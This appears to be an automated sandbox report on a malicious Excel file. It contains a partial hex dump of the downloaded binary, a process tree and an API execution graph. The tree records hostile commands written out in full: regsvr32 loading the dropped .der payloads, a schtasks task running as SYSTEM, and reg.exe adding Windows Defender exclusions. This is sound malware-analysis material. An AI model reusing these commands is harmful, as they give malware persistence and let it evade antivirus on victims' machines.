                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
                Sep 24, 2021 17:27:14.178761005 CEST1049INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:27:14.178813934 CEST1051INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:27:14.178865910 CEST1052INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii:
                Sep 24, 2021 17:27:14.178903103 CEST1053INData Raw: 3b f0 74 1c 00 9f c8 5d 07 10 8b c6 2b c3 03 c8 8b c1 2b c3 83 ef 02 83 ff 02 8d 74 06 50 7f d9 0f b6 05 d5 5d 07 10 8b d9 0f af de 0f b6 35 cd 5d 07 10 69 db 93 6c 01 00 8d 3c 30 81 ff c4 00 00 00 a0 78 5d 07 10 89 0d d8 5d 07 10 75 1e 0f b6 f0
                Data Ascii: ;t]++tP]5]il<0x]]u+fl$+a]*T$U]]PIu++a]*T$U]]5]+U;wT]];va-t]+
                Sep 24, 2021 17:27:14.178951979 CEST1055INData Raw: 07 10 80 c2 55 00 15 d7 5d 07 10 83 c3 50 81 7c 24 24 c4 00 00 00 75 1d 8b 15 c4 5d 07 10 03 d2 8b f2 2b 35 74 5d 07 10 2b f1 83 c6 61 89 35 74 5d 07 10 eb 23 0f b6 05 74 5d 07 10 8b 35 74 5d 07 10 2a c1 04 55 00 05 d7 5d 07 10 83 05 c4 5d 07 10
                Data Ascii: U]P|$$u]+5t]+a5t]#t]5t]*U]]Px]9]r]5t]*(]x]T$(s+T$(T$f|$]+v 5]u]*]*x]ax]];wT]]
                Sep 24, 2021 17:27:14.178986073 CEST1055INData Raw: 07 10 2a d3 80 c2 61 83 c4 04 a3 d8 5d 07 10 88 15 78 5d 07 10 84 28 0b 67 8b 35 c4 5d 07 10 66 0f b6 3d d2 5d 07 10 8b cb 2b ce 83 c1 03 0f b7 c9 66 3b f9 89 4c 24 10 77 0c 0f b7 c9 a2 cc 5d 07 10 8d 5c 01 0a 8d 8c 1e bd 3f 00 00 0f b7 c9 89 4c
                Data Ascii: *a]x](g5]f=]+f;L$w]\?L$f$=];t%]++\Px]]]=
                Sep 24, 2021 17:27:14.179017067 CEST1056INData Raw: 5d 07 10 3b c7 74 27 0f b6 86 c8 5d 07 10 2b d8 0f b7 fd 8b c3 2b c7 0f b6 f9 83 c0 61 3b c7 a3 d8 5d 07 10 74 08 83 c6 01 83 fe 32 7c ce 5f 5e 5d 0f b6 c2 5b 83 c4 20 c3 cc cc cc 53 55 8b 6c 24 0c 56 8b f0 8b 4e 18 83 f9 08 8d 5e 04 72 04 8b 03
                Data Ascii: ];t']++a;]t2|_^][ SUl$VN^r=iw7rVP=ivri+QV^][F+;v(;swvMW~_t;FrNU+hiPJR1~~r
                Sep 24, 2021 17:27:14.179047108 CEST1058INData Raw: 66 c7 04 58 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 18 08 72 0c 8b 56 04 52 e8 ae 09 00 00 83 c4 04 33 c0 50 c7 46 18 07 00 00 00 89 46 14 50 66 89 46 04 e8 cc 0d 00 00 cc cc cc cc cc cc cc cc cc cc cc cc
                Data Ascii: fXMdY_^[]u~rVR3PFFPfFw3RT3s$PL$D$hh8L$QD$oD$VP^% %%%$Uuuuu
                Sep 24, 2021 17:27:14.198044062 CEST1059INData Raw: 0b ff 71 14 56 e8 bd fc ff ff eb 29 80 7c 24 0c 00 74 18 83 fe 10 73 13 8b 41 14 3b f0 73 02 8b c6 50 6a 01 e8 53 fc ff ff eb 0a 85 f6 75 06 56 e8 2b fc ff ff 33 c0 3b c6 1b c0 f7 d8 5e c2 08 00 56 ff 74 24 08 8b f1 e8 a1 fe ff ff c7 06 c4 a1 02
                Data Ascii: qV)|$tsA;sPjSuV+3;^Vt$^US]VW}G;s+EE;EsE;uEjPSjFjuCt8rNrFFuWQPuz_^[]UV
                Sep 24, 2021 17:27:14.198105097 CEST1061INData Raw: 01 74 07 56 e8 5d ff ff ff 59 8b c6 5e c2 04 00 8b 44 24 04 83 c1 09 51 83 c0 09 50 e8 6d 14 00 00 f7 d8 59 1b c0 59 40 c2 04 00 56 6a 01 68 8c 50 07 10 8b f1 e8 f5 fc ff ff c7 06 a0 a1 02 10 8b c6 5e c3 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 f6 15
                Data Ascii: tV]Y^D$QPmYY@VjhP^UuYtunYtL^@^uL^h!YVMhh8EPEUQESVWWjPu3V>LVj


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: EXCEL.EXE PID: 1928 Parent PID: 596

                General

                Start time:17:27:14
                Start date:24/09/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f860000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2800 Parent PID: 1928

                General

                Start time:17:27:34
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -silent ..\Fiosa.der
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2792 Parent PID: 2800

                General

                Start time:17:27:34
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -silent ..\Fiosa.der
                Imagebase:0xe50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: explorer.exe PID: 2208 Parent PID: 2792

                General

                Start time:17:28:00
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2016 Parent PID: 1928

                General

                Start time:17:28:01
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -silent ..\Fiosa1.der
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: schtasks.exe PID: 2004 Parent PID: 2208

                General

                Start time:17:28:02
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42
                Imagebase:0x7c0000
                File size:179712 bytes
                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2244 Parent PID: 2016

                General

                Start time:17:28:02
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -silent ..\Fiosa1.der
                Imagebase:0xf50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2032 Parent PID: 1672

                General

                Start time:17:28:05
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2600 Parent PID: 2032

                General

                Start time:17:28:05
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s 'C:\Users\user\Fiosa.der'
                Imagebase:0xf50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Chronological Activities

                Analysis Process: explorer.exe PID: 2180 Parent PID: 2244

                General

                Start time:17:28:26
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2524 Parent PID: 1928

                General

                Start time:17:28:27
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -silent ..\Fiosa2.der
                Imagebase:0xff5a0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2212 Parent PID: 2524

                General

                Start time:17:28:27
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -silent ..\Fiosa2.der
                Imagebase:0xf50000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Analysis Process: explorer.exe PID: 448 Parent PID: 2600

                General

                Start time:17:28:29
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Analysis Process: reg.exe PID: 2076 Parent PID: 448

                General

                Start time:17:28:32
                Start date:24/09/2021
                Path:C:\Windows\System32\reg.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
                Imagebase:0xff370000
                File size:74752 bytes
                MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Analysis Process: reg.exe PID: 3048 Parent PID: 448

                General

                Start time:17:28:34
                Start date:24/09/2021
                Path:C:\Windows\System32\reg.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'
                Imagebase:0xffb90000
                File size:74752 bytes
                MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Analysis Process: explorer.exe PID: 1704 Parent PID: 2212

                General

                Start time:17:28:51
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\explorer.exe
                Imagebase:0x4b0000
                File size:2972672 bytes
                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 244 Parent PID: 1672

                General

                Start time:17:30:00
                Start date:24/09/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
                Imagebase:0xff9c0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Analysis Process: regsvr32.exe PID: 2860 Parent PID: 244

                General

                Start time:17:30:00
                Start date:24/09/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline: -s 'C:\Users\user\Fiosa.der'
                Imagebase:0x490000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Chronological Activities

                Disassembly

                Code Analysis

                Reset < >

                  Analysis Process: regsvr32.exe PID: 2792 Parent PID: 2800 regsvr32.exeCOMMON

                  Execution Graph

                  Execution Coverage:5.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:8.6%
                  Total number of Nodes:1362
                  Total number of Limit Nodes:25

                  Graph

                  execution_graph 11105 10028d00 11106 10028d1a GetSystemDirectoryW 11105->11106 11108 10028e02 VirtualProtectEx 11106->11108 11109 10028df5 11106->11109 11110 10028e3a GetSystemDirectoryW 11108->11110 11109->11108 11112 10028f59 11110->11112 11113 10005f82 OutputDebugStringA 11114 10005fa2 11113->11114 11115 100060cc 11113->11115 11142 100085ef HeapCreate 11114->11142 11117 100060d2 SetLastError 11115->11117 11118 10006097 11115->11118 11117->11118 11119 10005fa7 11143 1000980c GetSystemTimeAsFileTime 11119->11143 11121 10005faf 11121->11118 11145 10008f78 11121->11145 11124 10005ffd 11124->11118 11125 10006006 memset 11124->11125 11129 1000601d 11125->11129 11130 1000604c 11129->11130 11148 100095c7 11129->11148 11155 10012a5b 11130->11155 11137 10006092 11140 100085d5 2 API calls 11137->11140 11138 1000609c 11171 100085d5 11138->11171 11140->11118 11142->11119 11144 1000983e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 11143->11144 11144->11121 11175 10008604 HeapAlloc 11145->11175 11147 10005fcb GetModuleHandleA GetModuleFileNameW GetLastError 11147->11118 11147->11124 11176 100084ab 11148->11176 11151 100085c2 11152 100085d2 11151->11152 11153 100085ca 11151->11153 11152->11129 11181 1000861a 11153->11181 11156 10012a90 11155->11156 11189 10008669 11156->11189 11158 10006057 11159 1000e1bc 11158->11159 11160 100095c7 HeapAlloc 11159->11160 11161 1000e1cf 11160->11161 11162 1000e1e6 11161->11162 11163 1000e1de GetModuleHandleA 11161->11163 11164 1000e1fb 11162->11164 11193 1000e171 11162->11193 11163->11162 11166 100085c2 2 API calls 11164->11166 11167 1000606d 11166->11167 11168 100095e1 11167->11168 11204 10008531 11168->11204 11170 1000607e GetFileAttributesW 11170->11137 11170->11138 11172 100085e3 11171->11172 11173 100060a1 CreateThread 11171->11173 11174 1000861a 2 API calls 11172->11174 11173->11118 11209 10005e06 11173->11209 11174->11173 11175->11147 11177 100084c1 11176->11177 11179 10006024 MultiByteToWideChar 11176->11179 11177->11179 11180 10008604 HeapAlloc 11177->11180 11179->11151 11180->11179 11182 10008666 11181->11182 11183 10008624 11181->11183 11182->11152 11183->11182 11186 1000874f 11183->11186 11187 10008758 memset 11186->11187 11188 10008654 HeapFree 11186->11188 11187->11188 11188->11182 11192 10008604 HeapAlloc 11189->11192 11191 1000867a 11191->11158 11192->11191 11198 10008604 HeapAlloc 11193->11198 11195 1000e183 11196 1000e1b2 11195->11196 11199 1000dfad 11195->11199 11196->11164 11198->11195 11200 1000e021 11199->11200 11201 1000dfc6 11199->11201 11200->11195 11201->11200 11202 1000e079 LoadLibraryA 11201->11202 11202->11200 11203 1000e087 GetProcAddress 11202->11203 11203->11200 11205 1000854d 11204->11205 11208 10008604 HeapAlloc 11205->11208 11207 10008581 11207->11170 11207->11207 11208->11207 11221 10005eb6 11209->11221 11213 10005e11 11217 10005e4b 11213->11217 11220 10005e1b 11213->11220 11285 1000ca25 11213->11285 11215 10005e82 11215->11220 11321 100030b7 11215->11321 11216 10005e7b 11299 10005c26 11216->11299 11217->11215 11217->11216 11222 1000e1bc 6 API calls 11221->11222 11223 10005eca 11222->11223 11224 1000e1bc 6 API calls 11223->11224 11225 10005ee3 11224->11225 11226 1000e1bc 6 API calls 11225->11226 11227 10005efc 11226->11227 11228 1000e1bc 6 API calls 11227->11228 11229 10005f15 11228->11229 11230 1000e1bc 6 API calls 11229->11230 11231 10005f30 11230->11231 11232 1000e1bc 6 API calls 11231->11232 11233 10005f49 11232->11233 11234 1000e1bc 6 API calls 11233->11234 11235 10005f62 11234->11235 11236 1000e1bc 6 API calls 11235->11236 11237 10005e0b 11236->11237 11238 1000d01f 11237->11238 11328 10008604 HeapAlloc 11238->11328 11240 1000d03a 11241 1000d045 GetCurrentProcessId 11240->11241 11284 1000d3f3 11240->11284 11242 1000d05d 11241->11242 11243 1000d072 GetModuleFileNameW 11242->11243 11244 1000d099 GetCurrentProcess 11243->11244 11245 1000d08c 11243->11245 11329 1000ba05 11244->11329 11245->11244 11247 1000d0a8 11248 1000d0b9 11247->11248 11336 1000ba62 11247->11336 11345 1000e3f1 11248->11345 11253 1000d0ee LookupAccountSidW 11254 1000d140 GetModuleFileNameW GetLastError 11253->11254 11255 1000d13e GetLastError 11253->11255 11257 1000d17f 11254->11257 11255->11254 11354 1000b7a8 memset GetComputerNameW lstrcpynW 11257->11354 11259 1000d196 11364 1000b67d 11259->11364 11262 1000d1bd MultiByteToWideChar 11263 1000d1d1 11262->11263 11374 1000b88a 11263->11374 11268 1000d257 11270 1000d261 11268->11270 11271 1000d266 GetSystemInfo 11268->11271 11269 1000d24a GetCurrentProcess IsWow64Process 11269->11268 11272 1000d274 GetWindowsDirectoryW 11270->11272 11271->11272 11273 100095e1 HeapAlloc 11272->11273 11274 1000d297 11273->11274 11275 100085d5 2 API calls 11274->11275 11276 1000d2d1 11275->11276 11278 1000d309 11276->11278 11413 10009640 11276->11413 11393 100122d3 11278->11393 11284->11213 11467 1000c8fd 11285->11467 11288 1000cb6e 11288->11217 11290 1000cb63 11292 1000861a 2 API calls 11290->11292 11291 1000cb51 11291->11290 11293 1000861a 2 API calls 11291->11293 11292->11288 11293->11291 11296 1000cacc GetLastError ResumeThread 11297 1000ca62 11296->11297 11298 1000cafc CloseHandle 11296->11298 11297->11290 11297->11291 11297->11296 11297->11298 11479 1000ae66 memset CreateProcessW 11297->11479 11480 1000cb77 11297->11480 11298->11297 11559 10009b43 11299->11559 11302 10005c51 11302->11220 11303 10005c69 11609 10005d7d 11303->11609 11307 10005cc7 11641 10005aff 11307->11641 11308 10005c78 11309 10005ccc 11308->11309 11310 10005c7d 11308->11310 11312 10005ce8 11309->11312 11320 10005cc5 11309->11320 11654 1000f8cc 11309->11654 11310->11312 11315 1000a86d 5 API calls 11310->11315 11312->11220 11316 10005c9d 11315->11316 11618 10005974 11316->11618 11675 10005a61 11320->11675 12734 10008604 HeapAlloc 11321->12734 11323 100030be 11324 100030f7 11323->11324 12735 10008604 HeapAlloc 11323->12735 11324->11220 11326 100030cf 11326->11324 11327 1000902d _ftol2_sse 11326->11327 11327->11324 11328->11240 11330 1000ba1d 11329->11330 11331 1000ba21 11330->11331 11417 1000b998 GetTokenInformation 11330->11417 11331->11247 11334 1000ba52 CloseHandle 11335 1000ba3e 11334->11335 11335->11247 11427 1000b946 GetCurrentThread OpenThreadToken 11336->11427 11339 1000bb18 11339->11248 11340 1000b998 6 API calls 11344 1000ba96 CloseHandle 11340->11344 11342 1000bb0e 11343 1000861a 2 API calls 11342->11343 11343->11339 11344->11339 11344->11342 11346 1000e410 11345->11346 11348 1000d0e3 11346->11348 11431 100091e3 11346->11431 11349 1000e3b6 11348->11349 11350 1000e3cd 11349->11350 11351 1000e3ed 11350->11351 11352 100091e3 HeapAlloc 11350->11352 11351->11253 11353 1000e3da 11352->11353 11353->11253 11355 100095e1 HeapAlloc 11354->11355 11356 1000b7ff GetVolumeInformationW 11355->11356 11357 100085d5 2 API calls 11356->11357 11358 1000b834 11357->11358 11359 10009640 2 API calls 11358->11359 11360 1000b855 lstrcatW 11359->11360 11436 1000c392 11360->11436 11363 1000b87b 11363->11259 11365 1000b698 11364->11365 11366 100095c7 HeapAlloc 11365->11366 11367 1000b6a2 11366->11367 11438 1001242d 11367->11438 11369 1000b6ed 11370 100085c2 2 API calls 11369->11370 11371 1000b6f9 11370->11371 11371->11262 11371->11263 11372 1001242d _ftol2_sse 11373 1000b6b7 11372->11373 11373->11369 11373->11372 11375 100095c7 HeapAlloc 11374->11375 11376 1000b8a5 11375->11376 11377 100095c7 HeapAlloc 11376->11377 11379 1000b8b1 11377->11379 11378 1000b941 GetCurrentProcess 11387 1000bbdf 11378->11387 11379->11378 11380 1001242d _ftol2_sse 11379->11380 11381 1000b902 11379->11381 11380->11379 11382 1001242d _ftol2_sse 11381->11382 11383 1000b92d 11381->11383 11382->11381 11384 100085c2 2 API calls 11383->11384 11385 1000b939 11384->11385 11386 100085c2 2 API calls 11385->11386 11386->11378 11388 1000bbf7 11387->11388 11389 1000b998 6 API calls 11388->11389 11390 1000bbfb memset GetVersionExA 11388->11390 11392 1000bc0f 11389->11392 11390->11268 11390->11269 11391 1000861a 2 API calls 11391->11390 11392->11390 11392->11391 11394 1000d3d2 11393->11394 11395 100122de 11393->11395 11397 1000902d 11394->11397 11395->11394 11396 1001242d _ftol2_sse 11395->11396 11396->11395 11398 1000903d 11397->11398 11398->11398 11399 1001242d _ftol2_sse 11398->11399 11402 10009058 11399->11402 11400 1000908c 11403 1000cd33 11400->11403 11401 1001242d _ftol2_sse 11401->11402 11402->11400 11402->11401 11407 1000cf18 11403->11407 11404 100095c7 HeapAlloc 11404->11407 11406 1000cf48 11441 1000aba3 CreateToolhelp32Snapshot 11406->11441 11407->11404 11407->11406 11409 100085c2 2 API calls 11407->11409 11448 100093be 11407->11448 11409->11407 11410 1000cf5f 11412 1000cf7c 11410->11412 11454 100094b7 11410->11454 11412->11284 11414 1000874f memset 11413->11414 11415 10009654 _vsnwprintf 11414->11415 11416 10009671 11415->11416 11416->11278 11418 1000b9ba GetLastError 11417->11418 11419 1000b9d7 11417->11419 11418->11419 11420 1000b9c5 11418->11420 11419->11334 11419->11335 11426 10008604 HeapAlloc 11420->11426 11422 1000b9cd 11422->11419 11423 1000b9db GetTokenInformation 11422->11423 11423->11419 11424 1000b9f0 11423->11424 11425 1000861a 2 API calls 11424->11425 11425->11419 11426->11422 11428 1000b98e 11427->11428 11429 1000b967 GetLastError 11427->11429 11428->11339 11428->11340 11429->11428 11430 1000b974 GetCurrentProcess OpenProcessToken 11429->11430 11430->11428 11432 100091ec 11431->11432 11434 100091fe 11431->11434 11435 10008604 HeapAlloc 11432->11435 11434->11348 11435->11434 11437 1000b867 CharUpperBuffW 11436->11437 11437->11363 11439 1001243c 11438->11439 11440 10012480 _ftol2_sse 11439->11440 11440->11373 11442 1000abc9 memset Process32First 11441->11442 11444 1000abf4 11441->11444 11442->11444 11445 1000ac02 11442->11445 11444->11410 11446 1000ac15 Process32Next 11445->11446 11447 1000ac28 CloseHandle 11445->11447 11460 1000ccc0 11445->11460 11446->11445 11446->11447 11447->11444 11450 100093d2 11448->11450 11465 10008604 HeapAlloc 11450->11465 11451 100094a1 11451->11407 11453 1000942a 11453->11451 11466 10008604 HeapAlloc 11453->11466 11455 10009503 11454->11455 11457 100094c8 11454->11457 11455->11410 11456 100094fa 11458 1000861a 2 API calls 11456->11458 11457->11455 11457->11456 11459 1000861a 2 